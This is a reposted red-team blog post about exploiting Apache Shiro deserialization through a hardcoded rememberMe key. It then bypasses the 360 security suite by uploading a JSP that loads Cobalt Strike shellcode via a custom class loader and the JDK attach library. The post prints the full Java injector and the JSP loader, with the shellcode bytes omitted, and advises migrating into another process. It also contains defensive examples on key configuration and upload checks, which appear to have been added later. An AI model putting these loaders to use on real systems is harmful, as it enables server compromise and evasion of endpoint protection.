Red Team Attacks, Part 2: Shiro Deserialization in Practice, Bypassing the 360 Security Suite's Interception

admin · 2022-09-26 18:33:43 · 91 views · 13,727 characters

1 Introduction

When exploiting deserialization you usually run into security software that blocks command execution; the method below can be used to get around that.

2 Process

After logging in to a site, a rememberMe value was found in the cookie, which points to Shiro.


The source code was obtained, the hardcoded key was located in the configuration file, and a tool was used to exploit the deserialization.


Listing the running processes showed the 360 security suite installed.


With 360 Safeguard (360安全卫士) present, dangerous cmd commands are intercepted.
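The key-recovery step above only works because the rememberMe key is a static value readable from the source tree. As an added example, not code from the original post, here is that weak Shiro configuration beside a corrected one using Shiro's own CookieRememberMeManager and AesCipherService APIs; the base64 placeholder key and the SHIRO_REMEMBERME_KEY variable name are assumptions.

```java
import org.apache.shiro.codec.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.web.mgt.CookieRememberMeManager;
import org.apache.shiro.web.mgt.DefaultWebSecurityManager;

public class RememberMeKeyConfig {

    // Weak: the AES key protecting the rememberMe cookie is a constant in the config file or
    // source tree. Anyone who reads it, as in the post, can encrypt an arbitrary serialized
    // object and have the server deserialize it on the next request.
    static DefaultWebSecurityManager weakConfig() {
        CookieRememberMeManager rmm = new CookieRememberMeManager();
        rmm.setCipherKey(Base64.decode("AAAAAAAAAAAAAAAAAAAAAA==")); // placeholder for the hardcoded key
        DefaultWebSecurityManager sm = new DefaultWebSecurityManager();
        sm.setRememberMeManager(rmm);
        return sm;
    }

    // Corrected: take the key from a secret injected at deploy time (assumed variable name),
    // otherwise generate a fresh random key, so nothing static ever sits in the repository.
    static DefaultWebSecurityManager hardenedConfig() {
        String secret = System.getenv("SHIRO_REMEMBERME_KEY");
        byte[] key = secret != null
                ? Base64.decode(secret)
                : new AesCipherService().generateNewKey().getEncoded();
        CookieRememberMeManager rmm = new CookieRememberMeManager();
        rmm.setCipherKey(key);
        DefaultWebSecurityManager sm = new DefaultWebSecurityManager();
        sm.setRememberMeManager(rmm);
        return sm;
    }
}
```

A key generated at startup invalidates existing rememberMe cookies on every restart and differs per node in a cluster, which is why the injected-secret path comes first. Shiro 1.2.5 and later already generate a random key when none is configured, so the weak pattern is an explicitly set constant.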

3 Loading shellcode from a JSP to get a CS session

The backend has a module with automatic extraction: upload a zip containing a .jsp file and it is extracted into the current directory. So a JSP can be used to load shellcode and bring up a CS session.
Use CS to generate Java shellcode, then base64-encode it:

```java
import java.io.IOException;

public class WindowsVirtualMachine {
    public WindowsVirtualMachine() {
    }

    // Native methods resolved from the JDK's attach library; the buffer is handed to the JVM
    // in-process rather than through a spawned shell, which is why cmd-level interception
    // does not see it.
    static native void enqueue(long var0, byte[] var2, String var3, String var4, Object... var5) throws IOException;

    static native long openProcess(int var0) throws IOException;

    public static void run(byte[] buf) {
        System.loadLibrary("attach");
        // The parameter is ignored; the CS-generated byte array was embedded here.
        // The shellcode bytes printed in the original post are omitted from this copy.
        buf = new byte[] { /* shellcode bytes omitted */ };
        try {
            enqueue(-1L, buf, "test", "test");
        } catch (Exception var2) {
            var2.printStackTrace();
        }
    }

    public static void main(String[] args) {
        WindowsVirtualMachine.run(new byte[]{});
    }
}
```


Then load it with a custom class loader:

```jsp
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.util.Base64" %>
<%!
    // Class loader that exposes defineClass so raw bytecode can be loaded at runtime.
    public static class Myloader extends ClassLoader {
        public Class get(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
%>
<%
    try {
        // Base64 of the compiled class goes here (left empty in the original post).
        String classStr = "";
        Class result = new Myloader().get(Base64.getDecoder().decode(classStr));
        for (Method m : result.getDeclaredMethods()) {
            System.out.println(m.getName());
            if (m.getName().equals("run")) {
                m.invoke(result, new byte[]{});
            }
        }
    } catch (Exception e) {
        e.printStackTrace();
    }
%>
```

After uploading through the backend and extracting, request shellcode.jsp.


After it runs, it is best to inject into another process, otherwise the site will crash; then end the current shellcode process.
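The delivery step works because the upload module extracts archives as-is and the container executes any .jsp that lands under the web root. As an added example, not part of the original post, here is the check such a module should run before extracting, applied to an in-memory archive constructed to mirror the post's upload; the extraction directory /srv/uploads and the entry names are constructed.

```java
import java.io.*;
import java.nio.file.*;
import java.util.*;
import java.util.zip.*;

public class UploadArchiveCheck {
    // Entry extensions the servlet container would execute if they landed under the web root.
    static final Set<String> EXECUTABLE = Set.of("jsp", "jspx", "jspf", "war", "class", "jar");

    /** Lists why an uploaded archive must be rejected; an empty list means it passed. */
    static List<String> findings(InputStream archive, Path extractRoot) throws IOException {
        List<String> problems = new ArrayList<>();
        Path root = extractRoot.toAbsolutePath().normalize();
        try (ZipInputStream zin = new ZipInputStream(archive)) {
            for (ZipEntry e = zin.getNextEntry(); e != null; e = zin.getNextEntry()) {
                String name = e.getName();
                // Zip slip: "../" segments or an absolute name escape the extraction directory.
                if (!root.resolve(name).normalize().startsWith(root)) {
                    problems.add("escapes extraction dir: " + name);
                }
                // Server-side code: the post plants shellcode.jsp exactly this way.
                int dot = name.lastIndexOf('.');
                String ext = dot < 0 ? "" : name.substring(dot + 1).toLowerCase(Locale.ROOT);
                if (!e.isDirectory() && EXECUTABLE.contains(ext)) {
                    problems.add("executable entry: " + name);
                }
            }
        }
        return problems;
    }

    // Constructed sample archive: a benign image, a traversal entry and a JSP, built in memory.
    static byte[] sampleZip() throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ZipOutputStream zout = new ZipOutputStream(bos)) {
            for (String n : new String[] {"logo.png", "../../webapps/ROOT/x.txt", "shellcode.jsp"}) {
                zout.putNextEntry(new ZipEntry(n));
                zout.write(new byte[] {0});
                zout.closeEntry();
            }
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        Path root = Paths.get("/srv/uploads"); // assumed extraction directory
        List<String> problems = findings(new ByteArrayInputStream(sampleZip()), root);
        problems.forEach(System.out::println);
        System.out.println(problems.isEmpty() ? "accept upload" : "reject upload");
    }
}
```

Extension checks alone are weak (case tricks, double extensions, container-specific mappings), so the module should additionally extract into a directory outside the web root that the container never serves.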

4 Follow

The public account regularly publishes security articles; follow it for easy reference next time.
If this article helped you, please share, like, and bookmark it.

5 About training

For penetration testing training, contact 暗月 (moonsec).

Originally published on the WeChat public account moonsec under the same title.

Reposted by CN-SEC (with thanks to the original author); keep this link when reposting: http://cn-sec.com/archives/1316750.html
